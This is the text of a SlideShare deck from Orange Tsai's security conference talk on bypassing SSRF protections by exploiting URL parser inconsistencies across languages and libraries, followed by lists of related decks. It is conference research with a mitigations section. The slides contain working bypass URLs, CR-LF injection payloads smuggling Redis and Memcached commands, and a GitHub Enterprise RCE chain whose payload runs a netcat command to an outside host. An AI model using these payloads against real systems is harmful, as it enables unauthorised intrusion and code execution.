SlideShare a Scribd company logo

A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! by Orange Tsai

CODE BLUE
CODE BLUE

We propose a new exploit technique that brings a whole-new attack surface to bypass SSRF (Server Side Request Forgery) protections. This is a very general attack approach, in which we used in combination with our own fuzzing tool to discover many 0days in built-in libraries of very widely-used programming languages, including Python, PHP, Perl, Ruby, Java, JavaScript, Wget and cURL. The root cause of the problem lies in the inconsistency of URL parsers and URL requesters. Being a very fundamental problem that exists in built-in libraries, sophisticated web applications such as WordPress (27% of the Web), vBulletin, MyBB and GitHub can also suffer, and 0days have been discovered in them via this technique. This general technique can also adapt to various code contexts and lead to protocol smuggling and SSRF bypassing. Several scenarios will be demonstrated to illustrate how URL parsers can be exploited to bypass SSRF protection and achieve RCE (Remote Code Execution), which is the case in our GitHub Enterprise demo. Understanding the basics of this technique, the audience won’t be surprised to know that more than 20 vulnerabilities have been found in famous programming languages and web applications aforementioned via this technique.

Engineering
1 of 90
Download to read offline
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! Orange Tsai
Taiwan No.1 About Orange Tsai
The most professional red team in Taiwan About Orange Tsai
The largest hacker conference in Taiwan founded by chrO.ot About Orange Tsai
Speaker - Speaker at several security conferences Black Hat USA, DEFCON, HITB, HITCON, WooYun, AVTokyo CTFer - CTFs we won champions / in finalists (as team HITCON) DEFCON, Codegate, Boston Key Party, HITB, Seccon, 0CTF, WCTF Bounty Hunter - Vendors I have found Remote Code Execution Facebook, GitHub, Uber, Apple, Yahoo, Imgur About Orange Tsai
Agenda Introduction Make SSRF great again Issues that lead to SSRF-Bypass Issues that lead to protocol smuggling Case studies and Demos Mitigations
What is SSRF? Server Side Request Forgery Bypass Firewall, Touch Intranet Compromise Internal services Struts2 Redis Elastic
Protocol Smuggling in SSRF Make SSRF more powerful Protocols that are suitable to smuggle HTTP based protocol Elastic, CouchDB, Mongodb, Docker Text-based protocol FTP, SMTP, Redis, Memcached
Quick Fun Example http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ urllib2 httplib requests urllib Quick Fun Example
Python is so Hard
Quick Fun Example CR-LF Injection on HTTP protocol Smuggling SMTP protocol over HTTP protocol http://127.0.0.1:25/%0D%0AHELO orange.tw%0D%0AMAIL FROM… >> GET / << 421 4.7.0 ubuntu Rejecting open proxy localhost [127.0.0.1] >> HELO orange.tw Connection closed
SMTP Hates HTTP Protocol It Seems Unexploitable
Gopher Is Good What If There Is No Gopher Support?
HTTPS What Won't Be Encrypted in a SSL Handshake?
Quick Fun Example https://127.0.0.1□%0D%0AHELO□orange.tw%0D%0AMAIL□FROM…:25/ $ tcpdump -i lo -qw - tcp port 25 | xxd 000001b0: 009c 0035 002f c030 c02c 003d 006a 0038 ...5./.0.,.=.j.8 000001c0: 0032 00ff 0100 0092 0000 0030 002e 0000 .2.........0.... 000001d0: 2b31 3237 2e30 2e30 2e31 200d 0a48 454c +127.0.0.1 ..HEL 000001e0: 4f20 6f72 616e 6765 2e74 770d 0a4d 4149 O orange. tw..MAI 000001f0: 4c20 4652 4f4d 2e2e 2e0d 0a11 000b 0004 L FROM.......... 00000200: 0300 0102 000a 001c 001a 0017 0019 001c ................ CR-LF Injection on HTTPS protocol Exploit the Unexploitable - Smuggling SMTP over TLS SNI
Quick Fun Example CR-LF Injection on HTTPS protocol Exploit the Unexploitable - Smuggling SMTP over TLS SNI https://127.0.0.1□%0D%0AHELO□orange.tw%0D%0AMAIL□FROM…:25/ $ tcpdump -i lo -qw - tcp port 25 | xxd 000001b0: 009c 0035 002f c030 c02c 003d 006a 0038 ...5./.0.,.=.j.8 000001c0: 0032 00ff 0100 0092 0000 0030 002e 0000 .2.........0.... 000001d0: 2b31 3237 2e30 2e30 2e31 200d 0a48 454c +127.0.0.1 ..HEL 000001e0: 4f20 6f72 616e 6765 2e74 770d 0a4d 4149 O orange.tw..MAI 000001f0: 4c20 4652 4f4d 2e2e 2e0d 0a11 000b 0004 L FROM.......... 00000200: 0300 0102 000a 001c 001a 0017 0019 001c ................
Quick Fun Example CR-LF Injection on HTTPS protocol Exploit the Unexploitable - Smuggling SMTP over TLS SNI https://127.0.0.1□%0D%0AHELO orange.tw%0D%0AMAIL FROM…:25/ $ tcpdump -i lo -qw - tcp port 25 | xxd 000001b0: 009c 0035 002f c030 c02c 003d 006a 0038 ...5./.0.,.=.j.8 000001c0: 0032 00ff 0100 0092 0000 0030 002e 0000 .2.........0.... 000001d0: 2b31 3237 2e30 2e30 2e31 200d 0a48 454c +127.0.0.1 ..HEL 000001e0: 4f20 6f72 616e 6765 2e74 770d 0a4d 4149 O orange.tw..MAI 000001f0: 4c20 4652 4f4d 2e2e 2e0d 0a11 000b 0004 L FROM.......... 00000200: 0300 0102 000a 001c 001a 0017 0019 001c ................
Quick Fun Example CR-LF Injection on HTTPS protocol Exploit the Unexploitable - Smuggling SMTP over TLS SNI https://127.0.0.1□%0D%0AHELO orange.tw%0D%0AMAIL FROM…:25/ $ tcpdump -i lo -qw - tcp port 25 >> ...5./.0.,.=.j.8.2.........0...+127.0.0.1 << 500 5.5.1 Command unrecognized: ...5./.0.,.=.j.8.2..0.+127.0.0.1 >> HELO orange.tw << 250 ubuntu Hello localhost [127.0.0.1], please meet you >> MAIL FROM: <admin@orange.tw> << 250 2.1.0 <admin@orange.tw>... Sender ok
Make SSRF Great Again
URL Parsing Issues It's all about the inconsistency between URL parser and requester Why validating a URL is hard? 1. Specification in RFC2396, RFC3986 but just SPEC 2. WHATWG defined a contemporary implementation based on RFC but different languages still have their own implementations
URL Components(RFC 3986) scheme authority path query fragment foo://example.com:8042/over/there?name=bar#nose
URL Components(RFC 3986) foo://example.com:8042/over/there?name=bar#nose (We only care about HTTP HTTPS) (It's complicated) (I don't care) (I don't care) scheme authority (It's complicated) path fragment query
Big Picture Libraries/Vulns CR-LF Injection URL Parsing Path Host SNI Port Injection Host Injection Path Injection Python httplib 💀 💀 💀 Python urllib 💀 💀 💀 Python urllib2 💀 💀 Ruby Net::HTTP 💀 💀 💀 Java net.URL 💀 💀 Perl LWP 💀 💀 NodeJS http 💀 💀 PHP http_wrapper 💀 💀 Wget 💀 💀 cURL 💀 💀
Consider the following PHP code $url = 'http://' . $_GET[url]; $parsed = parse_url($url); if ( $parsed[port] == 80 && $parsed[host] == 'google.com') { readfile($url); } else { die('You Shall Not Pass'); } Abusing URL Parsers
http://127.0.0.1:11211:80/ Abusing URL Parsers
http://127.0.0.1:11211:80/ PHP readfile Perl LWP PHP parse_url Perl URI Abusing URL Parsers
RFC3986 authority = [ userinfo "@" ] host [ ":" port ] port = *DIGIT host = IP-literal / IPv4address / reg-name reg-name = *( unreserved / pct-encoded / sub-delims ) unreserved = ALPHA / DIGIT / "-" / "." / "_" / "~" sub-delims = "!" / "$" / "&" / "'" / "(" / ")" / "*" / "+" / "," / ";" / "=" Abusing URL Parsers
http://google.com#@evil.com/ Abusing URL Parsers
http://google.com#@evil.com/ PHP parse_url PHP readfile Abusing URL Parsers
Several programing languages suffered from this issue cURL, PHP, Python RFC3968 section 3.2 The authority component is preceded by a double slash ("//") and is terminated by the next slash ("/"), question mark ("?"), or number sign ("#") character, or by the end of the URI Abusing URL Parsers
How About cURL?
http://foo@evil.com:80@google.com/ Abusing URL Parsers
http://foo@evil.com:80@google.com/ cURL libcurl NodeJS URL Perl URI Go net/url PHP parse_url Ruby addressable Abusing URL Parsers
Abusing URL Parsers cURL / libcurl PHP parse_url 💀 Perl URI 💀 Ruby uri Ruby addressable 💀 NodeJS url 💀 Java net.URL Python urlparse Go net/url 💀
Report the bug to cURL team and get a patch quickly Bypass the patch with a space Abusing URL Parsers http://foo@127.0.0.1 @google.com/
Report Again But… "curl doesn't verify that the URL is 100% syntactically correct. It is instead documented to work with URLs and sort of assumes that you pass it correct input"
Won't Fix But previous patch still applied on cURL 7.54.0
Consider the following NodeJS code NodeJS Unicode Failure var base = "http://orange.tw/sandbox/"; var path = req.query.path; if (path.indexOf("..") == -1) { http.get(base + path, callback); }
NodeJS Unicode Failure http://orange.tw/sandbox/NN/passwd
NodeJS Unicode Failure http://orange.tw/sandbox/xFFx2ExFFx2E/passwd
NodeJS Unicode Failure http://orange.tw/sandbox/xFFx2ExFFx2E/passwd
NodeJS Unicode Failure http://orange.tw/sandbox/../passwd
/ is new ../(in NodeJS HTTP) (U+FF2E) Full width Latin capital letter N
What the ____
NodeJS Unicode Failure HTTP module prevents requests from CR-LF Injection Encode the New-lines as URL encoding http://127.0.0.1:6379/rnSLAVEOF orange.tw 6379rn $ nc -vvlp 6379 >> GET /%0D%0ASLAVEOF%20orange.tw%206379%0D%0A HTTP/1.1 >> Host: 127.0.0.1:6379 >> Connection: close
NodeJS Unicode Failure HTTP module prevents requests from CR-LF Injection Break the protections by Unicode U+FF0D U+FF0A http://127.0.0.1:6379/-*SLAVEOF@orange.tw@6379-* $ nc -vvlp 6379 >> GET / >> SLAVEOF orange.tw 6379 >> HTTP/1.1 >> Host: 127.0.0.1:6379 >> Connection: close
GLibc NSS Features In Glibc source code file resolv/ns_name.c#ns_name_pton() /*% * Convert an ascii string into an encoded domain name as per RFC1035. */ int ns_name_pton(const char *src, u_char *dst, size_t dstsiz)
GLibc NSS Features RFC1035 - Decimal support in gethostbyname() void main(int argc, char **argv) { char *host = "or097nge.tw"; struct in_addr *addr = gethostbyname(host)->h_addr; printf("%sn", inet_ntoa(*addr)); } …50.116.8.239
GLibc NSS Features RFC1035 - Decimal support in gethostbyname() >>> import socket >>> host = 'orange.tw' >>> print host orange.tw >>> socket.gethostbyname(host) '50.116.8.239'
GLibc NSS Features void main(int argc, char **argv) { struct addrinfo *res; getaddrinfo("127.0.0.1 foo", NULL, NULL, &res); struct sockaddr_in *ipv4 = (struct sockaddr_in *)res->ai_addr; printf("%sn", inet_ntoa(ipv4->sin_addr)); } …127.0.0.1 Linux getaddrinfo() strip trailing rubbish followed by whitespaces
GLibc NSS Features Linux getaddrinfo() strip trailing rubbish followed by whitespaces Lots of implementations relied on getaddrinfo() >>> import socket >>> socket.gethostbyname("127.0.0.1rnfoo") '127.0.0.1'
GLibc NSS Features Exploit Glibc NSS features on URL Parsing http://127.0.0.1tfoo.google.com http://127.0.0.1%09foo.google.com http://127.0.0.1%2509foo.google.com
GLibc NSS Features Exploit Glibc NSS features on URL Parsing Why this works? Some library implementations decode the URL twice… http://127.0.0.1%2509foo.google.com
Exploit Glibc NSS features on Protocol Smuggling HTTP protocol 1.1 required a host header $ curl -vvv http://I-am-a-very-very-weird-domain.com >> GET / HTTP/1.1 >> Host: I-am-a-very-very-weird-domain.com >> User-Agent: curl/7.53.1 >> Accept: */* GLibc NSS Features
GLibc NSS Features Exploit Glibc NSS features on Protocol Smuggling HTTP protocol 1.1 required a host header http://127.0.0.1rnSLAVEOF orange.tw 6379rn:6379/ $ nc -vvlp 6379 >> GET / HTTP/1.1 >> Host: 127.0.0.1 >> SLAVEOF orange.tw 6379 >> :6379 >> Connection: close
GLibc NSS Features https://127.0.0.1rnSET foo 0 60 5rn:443/ $ nc -vvlp 443 >> ..=5</.Aih9876.'. #...$...?...).%..g@?>3210...EDCB.. >> .....5'%"127.0.0.1 >> SET foo 0 60 5 Exploit Glibc NSS features on Protocol Smuggling SNI Injection - Embed hostname in SSL Client Hello Simply replace HTTP with HTTPS
GLibc NSS Features Break the Patch of Python CVE-2016-5699 CR-LF Injection in HTTPConnection.putheader() Space followed by CR-LF? _is_illegal_header_value = re.compile(rb'n(?![ t])|r(?![ tn])').search … if _is_illegal_header_value(values[i]): raise ValueError('Invalid header value %r' % (values[i],))
Break the Patch of Python CVE-2016-5699 CR-LF Injection in HTTPConnection.putheader() Space followed by CR-LF? Bypass with a leading space >>> import urllib >>> url = 'http://0rn SLAVEOF orange.tw 6379rn :80' >>> urllib.urlopen(url) GLibc NSS Features
Break the Patch of Python CVE-2016-5699 Exploit with a leading space Thanks to Redis and Memcached GLibc NSS Features http://0rn SLAVEOF orange.tw 6379rn :6379/ >> GET / HTTP/1.0 << -ERR wrong number of arguments for 'get' command >> Host: 0 << -ERR unknown command 'Host:' >> SLAVEOF orange.tw 6379 << +OK Already connected to specified master
Abusing IDNA Standard The problem relied on URL parser and URL requester use different IDNA standard IDNA2003 UTS46 IDNA2008 ⓖⓞⓞⓖⓛⓔ.com google.com google.com Invalid gu200Doogle.com google.com google.com xn--google-pf0c.com baß.de bass.de bass.de xn--ba-hia.de
Abusing IDNA Standard >> "ß".toLowerCase() "ß" >> "ß".toUpperCase() "SS" >> ["ss", "SS"].indexOf("ß") false >> location.href = "http://wordpreß.com" The problem relied on URL parser and URL requester use different IDNA standard
Cat Studies
Abusing URL Parsers - Case Study WordPress 1. Paid lots of attentions on SSRF protections 2. We found 3 distinct ways to bypass the protections 3. Bugs have been reported since Feb. 25, 2017 but still unpatched 4. For the Responsible Disclosure Process, I will use MyBB as following case study
Abusing URL Parsers - Case Study The main concept is finding different behaviors among URL parser, DNS checker and URL requester URL parser DNS checker URL requester WordPress parse_url() gethostbyname() *cURL vBulletin parse_url() None *cURL MyBB parse_url() gethostbynamel() *cURL * First priority
Abusing URL Parsers - Case Study SSRF-Bypass tech #1 Time-of-check to Time-of-use problem 1 $url_components = @parse_url($url); 2 if( 3 !$url_components || 4 empty($url_components['host']) || 5 (!empty($url_components['scheme']) && !in_array($url_components['scheme'], array('http', 'https'))) || 6 (!empty($url_components['port']) && !in_array($url_components['port'], array(80, 8080, 443))) 7 ) { return false; } 8 9 $addresses = gethostbynamel($url_components['host']); 10 if($addresses) { 11 // check addresses not in disallowed_remote_addresses 12 } 13 14 $ch = curl_init(); 15 curl_setopt($ch, CURLOPT_URL, $url); 16 curl_exec($ch);
Abusing URL Parsers - Case Study 1. gethostbyname() and get 1.2.3.4 2. Check 1.2.3.4 not in blacklist 3. Fetch URL by curl_init() and cURL query DNS again! 4. 127.0.0.1 fetched, SSRF! Q: foo.orange.tw A: 1.2.3.4 Q: foo.orange.tw A: 127.0.0.1 http://foo.orange.tw/ Hacker MyBB DNS 1 2 4 3
Abusing URL Parsers - Case Study SSRF-Bypass tech #2 The inconsistency between DNS checker and URL requester There is no IDNA converter in gethostbynamel(), but cURL has 1 $url = 'http://ß.orange.tw/'; // 127.0.0.1 2 3 $host = parse_url($url)[host]; 4 $addresses = gethostbynamel($host); // bool(false) 5 if ($address) { 6 // check if address in white-list 7 } 8 9 $ch = curl_init(); 10 curl_setopt($ch, CURLOPT_URL, $url); 11 curl_exec($ch);
Abusing URL Parsers - Case Study SSRF-Bypass tech #3 The inconsistency between URL parser and URL requester Fixed in PHP 7.0.13 …127.0.0.1:11211 fetched $url = 'http://127.0.0.1:11211#@google.com:80/'; $parsed = parse_url($url); var_dump($parsed[host]); // string(10) "google.com" var_dump($parsed[port]); // int(80) curl($url);
Abusing URL Parsers - Case Study SSRF-Bypass tech #3 The inconsistency between URL parser and URL requester Fixed in cURL 7.54 (The version of libcurl in Ubuntu 17.04 is still 7.52.1) $url = 'http://foo@127.0.0.1:11211@google.com:80/'; $parsed = parse_url($url); var_dump($parsed[host]); // string(10) "google.com" var_dump($parsed[port]); // int(80) curl($url); …127.0.0.1:11211 fetched
Abusing URL Parsers - Case Study SSRF-Bypass tech #3 The inconsistency between URL parser and URL requester cURL won't fix :) $url = 'http://foo@127.0.0.1 @google.com:11211/'; $parsed = parse_url($url); var_dump($parsed[host]); // string(10) "google.com" var_dump($parsed[port]); // int(11211) curl($url); …127.0.0.1:11211 fetched
Protocol Smuggling - Case Study GitHub Enterprise Standalone version of GitHub Written in Ruby on Rails and code have been obfuscated
Protocol Smuggling - Case Study About Remote Code Execution on GitHub Enterprise Best report in GitHub 3rd Bug Bounty Anniversary Promotion! Chaining 4 vulnerabilities into RCE
Protocol Smuggling - Case Study First bug - SSRF-Bypass on Webhooks What is Webhooks?
Protocol Smuggling - Case Study First bug - SSRF-Bypass on Webhooks Fetching URL by gem faraday Blacklisting Host by gem faraday-restrict-ip-addresses Blacklist localhost, 127.0.0.1… ETC Simply bypassed with a zero http://0/
Protocol Smuggling - Case Study First bug - SSRF-Bypass on Webhooks There are several limitations in this SSRF Not allowed 302 redirection Not allowed scheme out of HTTP and HTTPS No CR-LF Injection in faraday Only POST method
Protocol Smuggling - Case Study Second bug - SSRF in internal Graphite service GitHub Enterprise uses Graphite to draw charts Graphite is bound on 127.0.0.1:8000 url = request.GET['url'] proto, server, path, query, frag = urlsplit(url) if query: path += '?' + query conn = HTTPConnection(server) conn.request('GET',path) resp = conn.getresponse()
SSRF Execution Chain : (
Protocol Smuggling - Case Study Third bug - CR-LF Injection in Graphite Graphite is written in Python The implementation of the second SSRF is httplib.HTTPConnection As I mentioned before, httplib suffers from CR-LF Injection We can smuggle other protocols with URL http://0:8000/composer/send_email ?to=orange@chroot.org &url=http://127.0.0.1:6379/%0D%0ASET…
Protocol Smuggling - Case Study Fourth bug - Unsafe Marshal in Memcached gem GitHub Enterprise uses Memcached gem as the cache client All Ruby objects stored in cache will be Marshal-ed
Protocol Smuggling - Case Study http://0:8000/composer/send_email ?to=orange@chroot.org &url=http://127.0.0.1:11211/%0D%0Aset%20githubproductionsearch/quer ies/code_query%3A857be82362ba02525cef496458ffb09cf30f6256%3Av3%3Aco unt%200%2060%20150%0D%0A%04%08o%3A%40ActiveSupport%3A%3ADeprecation %3A%3ADeprecatedInstanceVariableProxy%07%3A%0E%40instanceo%3A%08ERB %07%3A%09%40srcI%22%1E%60id%20%7C%20nc%20orange.tw%2012345%60%06%3A %06ET%3A%0C%40linenoi%00%3A%0C%40method%3A%0Bresult%0D%0A%0D%0A First SSRF Second SSRF Memcached protocol Marshal data
Protocol Smuggling - Case Study http://0:8000/composer/send_email ?to=orange@chroot.org &url=http://127.0.0.1:11211/%0D%0Aset%20githubproductionsearch/quer ies/code_query%3A857be82362ba02525cef496458ffb09cf30f6256%3Av3%3Aco unt%200%2060%20150%0D%0A%04%08o%3A%40ActiveSupport%3A%3ADeprecation %3A%3ADeprecatedInstanceVariableProxy%07%3A%0E%40instanceo%3A%08ERB %07%3A%09%40srcI%22%1E%60id%20%7C%20nc%20orange.tw%2012345%60%06%3A %06ET%3A%0C%40linenoi%00%3A%0C%40method%3A%0Bresult%0D%0A%0D%0A First SSRF Second SSRF Memcached protocol Marshal data
Protocol Smuggling - Case Study http://0:8000/composer/send_email ?to=orange@chroot.org &url=http://127.0.0.1:11211/%0D%0Aset%20githubproductionsearch/quer ies/code_query%3A857be82362ba02525cef496458ffb09cf30f6256%3Av3%3Aco unt%200%2060%20150%0D%0A%04%08o%3A%40ActiveSupport%3A%3ADeprecation %3A%3ADeprecatedInstanceVariableProxy%07%3A%0E%40instanceo%3A%08ERB %07%3A%09%40srcI%22%1E%60id%20%7C%20nc%20orange.tw%2012345%60%06%3A %06ET%3A%0C%40linenoi%00%3A%0C%40method%3A%0Bresult%0D%0A%0D%0A First SSRF Second SSRF Memcached protocol Marshal data $12,500
Demo GitHub Enterprise < 2.8.7 Remote Code Execution https://youtu.be/GoO7_lCOfic
Mitigations Application layer Use the only IP and hostname, do not reuse the input URL Network layer Using Firewall or NetWork Policy to block Intranet traffics Projects SafeCurl by @fin1te Advocate by @JordanMilne
Summary New Attack Surface on SSRF-Bypass URL Parsing Issues Abusing IDNA Standard New Attack Vector on Protocol Smuggling Linux Glibc NSS Features NodeJS Unicode Failure Case Studies
Further works URL parser issues in OAuth URL parser issues in modern browsers URL parser issues in Proxy server …
Acknowledgements 1. Invalid URL parsing with '#' by @bagder 2. URL Interop by @bagder 3. Shibuya.XSS #8 by @mala 4. SSRF Bible by @Wallarm 5. Special Thanks Allen Own Birdman Chiu Henry Huang
Cat Acknowledgements https://twitter.com/harapeko_lady/status/743463485548355584 https://tuswallpapersgratis.com/gato-trabajando/ https://carpet.vidalondon.net/cat-in-carpet/ Some Meme Websites…
Thanks orange@chroot.org @orange_8361

Recommended

HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypassДмитрий Бумов
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...
Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...
Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...HackerOne
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security HeadersIsmael Goncalves
 

Recommended

HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypassДмитрий Бумов
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...
Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...
Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...HackerOne
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security HeadersIsmael Goncalves
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & InconsistencyGreenD0g
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadSecurity BSides Ahmedabad
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigFrans Rosén
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
John the ripper & hydra password cracking tool
John the ripper & hydra password cracking toolJohn the ripper & hydra password cracking tool
John the ripper & hydra password cracking toolMd. Raquibul Hoque
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrfn|u - The Open Security Community
 
DVGA writeup
DVGA writeupDVGA writeup
DVGA writeupYu Iwama
 
Pentesting GraphQL Applications
Pentesting GraphQL ApplicationsPentesting GraphQL Applications
Pentesting GraphQL ApplicationsNeelu Tripathy
 
Sql injection
Sql injectionSql injection
Sql injectionNikunj Dhameliya
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
HTTPを理解する
HTTPを理解するHTTPを理解する
HTTPを理解するIIJ
 
Http security response headers
Http security response headers Http security response headers
Http security response headers mohammadhosseinrouha
 
Pwning mobile apps without root or jailbreak
Pwning mobile apps without root or jailbreakPwning mobile apps without root or jailbreak
Pwning mobile apps without root or jailbreakAbraham Aranguren
 
CyberChefの使い方(HamaCTF2019 WriteUp編)
CyberChefの使い方(HamaCTF2019 WriteUp編)CyberChefの使い方(HamaCTF2019 WriteUp編)
CyberChefの使い方(HamaCTF2019 WriteUp編)Shota Shinogi
 
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...sonjeku1
 
Stu t17 a
Stu t17 aStu t17 a
Stu t17 aSelectedPresentations
 

More Related Content

What's hot

Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & InconsistencyGreenD0g
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigFrans Rosén
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
John the ripper & hydra password cracking tool
John the ripper & hydra password cracking toolJohn the ripper & hydra password cracking tool
John the ripper & hydra password cracking toolMd. Raquibul Hoque
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
DVGA writeup
DVGA writeupDVGA writeup
DVGA writeupYu Iwama
 
Pentesting GraphQL Applications
Pentesting GraphQL ApplicationsPentesting GraphQL Applications
Pentesting GraphQL ApplicationsNeelu Tripathy
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
HTTPを理解する
HTTPを理解するHTTPを理解する
HTTPを理解するIIJ
 
Pwning mobile apps without root or jailbreak
